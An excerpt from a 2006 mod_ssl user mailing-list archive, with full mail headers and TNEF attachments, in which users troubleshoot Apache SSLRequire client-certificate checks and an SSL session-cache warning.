Date: Wed, 5 Apr 2006 16:54:24 +0200
Message-ID: <9B4E37DCB8D57D408FF960B536F0E5274330FC@ms01012.avinci.de>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: <9B4E37DCB8D57D408FF960B536F0E5274330FC@ms01012.avinci.de>
Thread-Topic: mod_ssl: SSLRequire
Thread-Index: AcZYv5VvJeK+gL9ZTGO+fLo6wTtF3gAAT6vI
From: 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------_=_NextPart_001_01C658C0.E9EDB2EA
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Perhaps
  SSLVerifyClient require

Default is
  SSLVerifyClient none

Greetings

Oliver
-----Urspr=FCngliche Nachricht-----
Von: owner-modssl-users@modssl.org im Auftrag von Olaf Gellert
Gesendet: Mi 05.04.2006 14:08
An: modssl-users@modssl.org
Betreff: mod_ssl: SSLRequire
=20
I try to do X.509 client authentication with Apache
Apache/2.0.54. This works fine. Now I want to check
for certain fields in the client certificate with
SSLRequire. Even though I ask that

%{SSL_CLIENT_S_DN_CN} eq "Testuser"

the server permits accesss to a client with
SSL_CLIENT_S_DN_CN=3D"testuser2". What's wrong?

Here is the according section from my config:

     SSLOptions +FakeBasicAuth +StdEnvVars +CompatEnvVars +StrictRequire
     

       AllowOverride None
       Options +FollowSymLinks +Includes
       Order deny,allow
       Deny from all
       Allow from localhost
       SSLRequireSSL
       SSLRequire (    %{SSL_CLIENT_S_DN_O} eq "SSLTest SubCA 01" \
                    && %{SSL_CLIENT_S_DN_OU} eq "User Certificates" \
                    && %{SSL_CLIENT_S_DN_CN} eq "Testuser" )
    

Anything forgotten? If I print out the environment from
within the webpage (with SSI #printenv), I see (among all
the other variables):

SSL_CLIENT_S_DN_O=3DSSLTest SubCA 01
SSL_CLIENT_S_DN_OU=3DUser Certificates
SSL_CLIENT_S_DN_CN=3Dtestuser2

Hmmm.... Any clues?

Olaf

--=20
Dipl.Inform. Olaf Gellert                  PRESECURE (R)
Senior Researcher,                       Consulting GmbH
Phone: (+49) 0700 / PRESECURE           og@pre-secure.de

                        A daily view on Internet Attacks
                        https://www.ecsirt.net/sensornet


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org


------_=_NextPart_001_01C658C0.E9EDB2EA
Content-Type: application/ms-tnef;
	name="winmail.dat"
Content-Transfer-Encoding: base64

eJ8+IgEOAQaQCAAEAAAAAAABAAEAAQeQBgAIAAAA5AQAAAAAAADoAAEIgAcAGAAAAElQTS5NaWNy
b3NvZnQgTWFpbC5Ob3RlADEIAQ2ABAACAAAAAgACAAEEgAEAGAAAAFJFOiBtb2Rfc3NsOiBTU0xS
ZXF1aXJlAAsIAQWAAwAOAAAA1gcEAAUAEAA2ABgAAwBHAQEggAMADgAAANYHBAAFABAANwAAAAMA
MAEBCYABACEAAAA4M0JBMUNDRjhFQkI0OTQ3QTkzNzlERDI1NkY0NEY0OQBnBwEDkAYACAwAADgA
AAADACYAAAAAAAMANgAAAAAAQAA5AOHxG9TAWMYBHgA9AAEAAAAFAAAAUkU6IAAAAAACAUcAAQAA
ADAAAABjPURFO2E9IDtwPUF2aW5jaTtsPU1TMDEwMTItMDYwNDA1MTQ1NTAwWi0xMzQ2NQAeAEkA
AQAAABQAAABtb2Rfc3NsOiBTU0xSZXF1aXJlAEAATgAAgRWuqVjGAR4AWgABAAAAHgAAAG93bmVy
LW1vZHNzbC11c2Vyc0Btb2Rzc2wub3JnAAAAAgFbAAEAAABZAAAAAAAAAIErH6S+oxAZnW4A3QEP
VAIAAAAAb3duZXItbW9kc3NsLXVzZXJzQG1vZHNzbC5vcmcAU01UUABvd25lci1tb2Rzc2wtdXNl
cnNAbW9kc3NsLm9yZwAAAAACAVwAAQAAACMAAABTTVRQOk9XTkVSLU1PRFNTTC1VU0VSU0BNT0RT
U0wuT1JHAAAeAF0AAQAAAA0AAABPbGFmIEdlbGxlcnQAAAAAAgFeAAEAAAA7AAAAAAAAAIErH6S+
oxAZnW4A3QEPVAIAAAAAT2xhZiBHZWxsZXJ0AFNNVFAAb2dAcHJlLXNlY3VyZS5kZQAAAgFfAAEA
AAAWAAAAU01UUDpPR0BQUkUtU0VDVVJFLkRFAAAAHgBmAAEAAAAFAAAAU01UUAAAAAAeAGcAAQAA
AB4AAABvd25lci1tb2Rzc2wtdXNlcnNAbW9kc3NsLm9yZwAAAB4AaAABAAAABQAAAFNNVFAAAAAA
HgBpAAEAAAARAAAAb2dAcHJlLXNlY3VyZS5kZQAAAAAeAHAAAQAAABQAAABtb2Rfc3NsOiBTU0xS
ZXF1aXJlAAIBcQABAAAAGwAAAAHGWL+VbyXivoC/WUxjvny6OsE7Rd4AAE+ryAAeAHQAAQAAABgA
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
T1U9RklSU1QgQURNSU5JU1RSQVRJVkUgR1JPVVAvQ049UkVDSVBJRU5UUy9DTj1NMDU0NwAAHgD6
PwEAAAAVAAAAU3lzdGVtIEFkbWluaXN0cmF0b3IAAAAAAgH7PwEAAAAeAAAAAAAAANynQMjAQhAa
tLkIACsv4YIBAAAAAAAAAC4AAAADAP0/5AQAAAMAGUAAAAAAAwAaQAAAAAADAB1AAAAAAAMAHkAA
AAAAHgAwQAEAAAAGAAAATTA1NDcAAAAeADFAAQAAAAYAAABNMDU0NwAAAB4AMkABAAAAHgAAAG93
bmVyLW1vZHNzbC11c2Vyc0Btb2Rzc2wub3JnAAAAHgAzQAEAAAARAAAAb2dAcHJlLXNlY3VyZS5k
ZQAAAAAeADhAAQAAAAYAAABNMDU0NwAAAB4AOUABAAAAAgAAAC4AAAADAHZA/////wsAKQAAAAAA
CwAjAAAAAAADAAYQZMzgJwMABxBLBQAAAwAQEAAAAAADABEQAAAAAB4ACBABAAAAZQAAAFBFUkhB
UFNTU0xWRVJJRllDTElFTlRSRVFVSVJFREVGQVVMVElTU1NMVkVSSUZZQ0xJRU5UTk9ORUdSRUVU
SU5HU09MSVZFUi0tLS0tVVJTUFL8TkdMSUNIRU5BQ0hSSUNIVC0AAAAAAgF/AAEAAAA7AAAAPDlC
NEUzN0RDQjhENTdENDA4RkY5NjBCNTM2RjBFNTI3NDMzMEZDQG1zMDEwMTIuYXZpbmNpLmRlPgAA
Ek8=

------_=_NextPart_001_01C658C0.E9EDB2EA--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Apr  5 16:54:58 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id AADD914D9D3; Wed,  5 Apr 2006 16:54:58 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail123.messagelabs.com (mail123.messagelabs.com [85.158.136.3])
	by master.modssl.org (Postfix) with SMTP id 635A014D82F
	for ; Wed,  5 Apr 2006 16:54:55 +0200 (CEST)
X-VirusChecked: Checked
X-Env-Sender: Oliver.Schaudt@unilog.de
X-Msg-Ref: server-10.tower-123.messagelabs.com!1144248814!17720083!1
X-StarScan-Version: 5.5.9.1; banners=-,-,-
X-Originating-IP: [194.45.208.28]
Received: (qmail 29403 invoked from network); 5 Apr 2006 14:53:34 -0000
Received: from mail.unilog.de (HELO mail.unilog.de) (194.45.208.28)
  by server-10.tower-123.messagelabs.com with SMTP; 5 Apr 2006 14:53:34 -0000
Received: from ms01012.avinci.de
	([10.200.1.28])
	by mail.unilog.de; Wed, 05 Apr 2006 16:53:25 +0200
X-MimeOLE: Produced By Microsoft Exchange V6.5.7226.0
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: multipart/mixed;
	boundary="----_=_NextPart_001_01C658C1.5D9A639F"
Subject: RE: Session Cache is not configured
Date: Wed, 5 Apr 2006 16:56:08 +0200
Message-ID: <9B4E37DCB8D57D408FF960B536F0E5274330FD@ms01012.avinci.de>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: <9B4E37DCB8D57D408FF960B536F0E5274330FD@ms01012.avinci.de>
Thread-Topic: Session Cache is not configured
Thread-Index: AcZYv5+dtAvVT0bSQbGe9SiWywgQpAAAXKfz
From: 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------_=_NextPart_001_01C658C1.5D9A639F
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable


Do you have some lines like=20
 or 
before the sslcache entry ?

I have to put this out of my ssl-config before it worked.

Greetings

Oliver



-----Urspr=FCngliche Nachricht-----
Von: owner-modssl-users@modssl.org im Auftrag von L. Steinbr=FCgger - =
Fa. Rameder
Gesendet: Mi 05.04.2006 16:45
An: modssl-users@modssl.org
Betreff: Session Cache is not configured
=20
Hallo,=20

I have a problem with APACHE MOD SSL. I installed Apache 2.2.0=20
at an Suse Linux System. The Server works fine, also with SSL, but=20
in my SSL LOG the following Error Code is written :

ssl_error.log
-----------------------------------------
[warn] Init: Session Cache is not configured [hint: SSLSessionCache]
-----------------------------------------

I believe that the error is my ssl_global.conf but i found no
further information in the internet ...

ssl_global.conf
----------------------------------------------------
SSLSessionCache         dbm:/var/log/apache2/ssl_cache
SSLSessionCacheTimeout  600
---------------------------------------------------

The following modules are installed

---------------------------------------------------
core_module (static)
mpm_prefork_module (static)
http_module (static)
so_module (static)
suexec_module (shared)
actions_module (shared)
alias_module (shared)
autoindex_module (shared)
cgi_module (shared)
dir_module (shared)
include_module (shared)
log_config_module (shared)
mime_module (shared)
negotiation_module (shared)
setenvif_module (shared)
status_module (shared)
userdir_module (shared)
asis_module (shared)
rewrite_module (shared)
ssl_module (shared)
vhost_alias_module (shared)
php5_module (shared)
authn_dbm_module (shared)
auth_basic_module (shared)
authz_groupfile_module (shared)
authz_host_module (shared)
authn_file_module (shared)
authz_user_module (shared)
authz_default_module (shared)
---------------------------------------------------


I hope that someone can help me :)

Lars Steinbr=FCgger
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org


------_=_NextPart_001_01C658C1.5D9A639F
Content-Type: application/ms-tnef;
	name="winmail.dat"
Content-Transfer-Encoding: base64

eJ8+IhAOAQaQCAAEAAAAAAABAAEAAQeQBgAIAAAA5AQAAAAAAADoAAEIgAcAGAAAAElQTS5NaWNy
b3NvZnQgTWFpbC5Ob3RlADEIAQ2ABAACAAAAAgACAAEEgAEAJAAAAFJFOiBTZXNzaW9uIENhY2hl
IGlzIG5vdCBjb25maWd1cmVkAHwMAQWAAwAOAAAA1gcEAAUAEAA4AAgAAwA5AQEggAMADgAAANYH
BAAFABAAOgAOAAMAQQEBCYABACEAAABFODQxNkQ4NUMyQTlERDRGQUY3NDhERkYwNTJEMzAzMABV
BwEDkAYAMAwAADgAAAADACYAAAAAAAMANgAAAAAAQAA5AH7KOxLBWMYBHgA9AAEAAAAFAAAAUkU6
IAAAAAACAUcAAQAAADAAAABjPURFO2E9IDtwPUF2aW5jaTtsPU1TMDEwMTItMDYwNDA1MTQ1ODE0
Wi0xMzQ2OAAeAEkAAQAAACAAAABTZXNzaW9uIENhY2hlIGlzIG5vdCBjb25maWd1cmVkAEAATgCA
MqGev1jGAR4AWgABAAAAHgAAAG93bmVyLW1vZHNzbC11c2Vyc0Btb2Rzc2wub3JnAAAAAgFbAAEA
AABZAAAAAAAAAIErH6S+oxAZnW4A3QEPVAIAAAAAb3duZXItbW9kc3NsLXVzZXJzQG1vZHNzbC5v
cmcAU01UUABvd25lci1tb2Rzc2wtdXNlcnNAbW9kc3NsLm9yZwAAAAACAVwAAQAAACMAAABTTVRQ
Ok9XTkVSLU1PRFNTTC1VU0VSU0BNT0RTU0wuT1JHAAAeAF0AAQAAAB4AAABMLiBTdGVpbmJy/Gdn
ZXIgLSBGYS4gUmFtZWRlcgAAAAIBXgABAAAAVwAAAAAAAACBKx+kvqMQGZ1uAN0BD1QCAAAAAEwu
IFN0ZWluYnL8Z2dlciAtIEZhLiBSYW1lZGVyAFNNVFAAbC5zdGVpbmJydWVnZ2VyQGt1cHBsdW5n
LmRlAAACAV8AAQAAACEAAABTTVRQOkwuU1RFSU5CUlVFR0dFUkBLVVBQTFVORy5ERQAAAAAeAGYA
AQAAAAUAAABTTVRQAAAAAB4AZwABAAAAHgAAAG93bmVyLW1vZHNzbC11c2Vyc0Btb2Rzc2wub3Jn
AAAAHgBoAAEAAAAFAAAAU01UUAAAAAAeAGkAAQAAABwAAABsLnN0ZWluYnJ1ZWdnZXJAa3VwcGx1
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
AABbAAAAAAAAANynQMjAQhAatLkIACsv4YIBAAAAAAAAAC9PPUFWSU5DSS9PVT1GSVJTVCBBRE1J
TklTVFJBVElWRSBHUk9VUC9DTj1SRUNJUElFTlRTL0NOPU0wNTQ3AAAeAPo/AQAAABUAAABTeXN0
ZW0gQWRtaW5pc3RyYXRvcgAAAAACAfs/AQAAAB4AAAAAAAAA3KdAyMBCEBq0uQgAKy/hggEAAAAA
AAAALgAAAAMA/T/kBAAAAwAZQAAAAAADABpAAAAAAAMAHUAAAAAAAwAeQAAAAAAeADBAAQAAAAYA
AABNMDU0NwAAAB4AMUABAAAABgAAAE0wNTQ3AAAAHgAyQAEAAAAeAAAAb3duZXItbW9kc3NsLXVz
ZXJzQG1vZHNzbC5vcmcAAAAeADNAAQAAABwAAABsLnN0ZWluYnJ1ZWdnZXJAa3VwcGx1bmcuZGUA
HgA4QAEAAAAGAAAATTA1NDcAAAAeADlAAQAAAAIAAAAuAAAAAwB2QP////8LACkAAAAAAAsAIwAA
AAAAAwAGEPcRI4QDAAcQBQcAAAMAEBAAAAAAAwAREAAAAAAeAAgQAQAAAGUAAABET1lPVUhBVkVT
T01FTElORVNMSUtFPElGTU9EVUxFTU9EU1NMQ09SPElGTU9EVUxFU1NMTU9EVUxFQkVGT1JFVEhF
U1NMQ0FDSEVFTlRSWT9JSEFWRVRPUFVUVEhJU09VVE9GAAAAAAIBfwABAAAAOwAAADw5QjRFMzdE
Q0I4RDU3RDQwOEZGOTYwQjUzNkYwRTUyNzQzMzBGREBtczAxMDEyLmF2aW5jaS5kZT4AAPBn

------_=_NextPart_001_01C658C1.5D9A639F--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Apr  5 16:58:17 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id E41E314D9FC; Wed,  5 Apr 2006 16:58:17 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.kupplung.de (mail.wwwkupplung.de [62.154.174.130])
	by master.modssl.org (Postfix) with ESMTP id 2A05714D97E
	for ; Wed,  5 Apr 2006 16:58:16 +0200 (CEST)
Received: from MAILSERVER (192.168.100.21)
          by mail.kupplung.de with MERCUR Mailserver (v5.00.17 OTMtMjY5NC01MTM1)
          for ; Wed, 5 Apr 2006 17:13:24 +0200
Received: from 192.168.100.1 [192.168.100.1]
	by MAILSERVER
	with XWall v3.33 ;
	Wed, 5 Apr 2006 17:13:23 +0200
X-MimeOLE: Produced By Microsoft Exchange V6.0.6487.1
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Subject: AW: Session Cache is not configured
Date: Wed, 5 Apr 2006 16:58:01 +0200
Message-ID: <89515DCF67A57444B10926F4E4400F410AA18A@hermes.local>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: Session Cache is not configured
Thread-Index: AcZYv5+dtAvVT0bSQbGe9SiWywgQpAAAXKfzAAANa3A=
From: =?iso-8859-1?Q?L=2E_Steinbr=FCgger_-_Fa=2E_Rameder?= 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: =?iso-8859-1?Q?L=2E_Steinbr=FCgger_-_Fa=2E_Rameder?= 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

It's a good idea ... I'll try it :)=20

-----Urspr=FCngliche Nachricht-----
Von: Schaudt, Oliver [mailto:owner-modssl-users@modssl.org] Im Auftrag =
von Oliver.Schaudt@unilog.de
Gesendet: Mittwoch, 5. April 2006 16:56
An: modssl-users@modssl.org
Betreff: RE: Session Cache is not configured


Do you have some lines like
 or  before the sslcache entry =
?

I have to put this out of my ssl-config before it worked.

Greetings

Oliver



-----Urspr=FCngliche Nachricht-----
Von: owner-modssl-users@modssl.org im Auftrag von L. Steinbr=FCgger - =
Fa. Rameder
Gesendet: Mi 05.04.2006 16:45
An: modssl-users@modssl.org
Betreff: Session Cache is not configured
=20
Hallo,=20

I have a problem with APACHE MOD SSL. I installed Apache 2.2.0 at an =
Suse Linux System. The Server works fine, also with SSL, but in my SSL =
LOG the following Error Code is written :

ssl_error.log
-----------------------------------------
[warn] Init: Session Cache is not configured [hint: SSLSessionCache]
-----------------------------------------

I believe that the error is my ssl_global.conf but i found no further =
information in the internet ...

ssl_global.conf
----------------------------------------------------
SSLSessionCache         dbm:/var/log/apache2/ssl_cache
SSLSessionCacheTimeout  600
---------------------------------------------------

The following modules are installed

---------------------------------------------------
core_module (static)
mpm_prefork_module (static)
http_module (static)
so_module (static)
suexec_module (shared)
actions_module (shared)
alias_module (shared)
autoindex_module (shared)
cgi_module (shared)
dir_module (shared)
include_module (shared)
log_config_module (shared)
mime_module (shared)
negotiation_module (shared)
setenvif_module (shared)
status_module (shared)
userdir_module (shared)
asis_module (shared)
rewrite_module (shared)
ssl_module (shared)
vhost_alias_module (shared)
php5_module (shared)
authn_dbm_module (shared)
auth_basic_module (shared)
authz_groupfile_module (shared)
authz_host_module (shared)
authn_file_module (shared)
authz_user_module (shared)
authz_default_module (shared)
---------------------------------------------------


I hope that someone can help me :)

Lars Steinbr=FCgger
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Apr  5 17:03:21 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 0331E14D9F2; Wed,  5 Apr 2006 17:03:21 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.kupplung.de (mail.kupplung.de [62.154.174.130])
	by master.modssl.org (Postfix) with ESMTP id 471D914D83E
	for ; Wed,  5 Apr 2006 17:03:19 +0200 (CEST)
Received: from MAILSERVER (192.168.100.21)
          by mail.kupplung.de with MERCUR Mailserver (v5.00.17 OTMtMjY5NC01MTM1)
          for ; Wed, 5 Apr 2006 17:18:29 +0200
Received: from 192.168.100.1 [192.168.100.1]
	by MAILSERVER
	with XWall v3.33 ;
	Wed, 5 Apr 2006 17:18:28 +0200
X-MimeOLE: Produced By Microsoft Exchange V6.0.6487.1
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Subject: AW: Session Cache is not configured
Date: Wed, 5 Apr 2006 17:03:06 +0200
Message-ID: <89515DCF67A57444B10926F4E4400F410AA18B@hermes.local>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: Session Cache is not configured
Thread-Index: AcZYv5+dtAvVT0bSQbGe9SiWywgQpAAAXKfzAAA8COA=
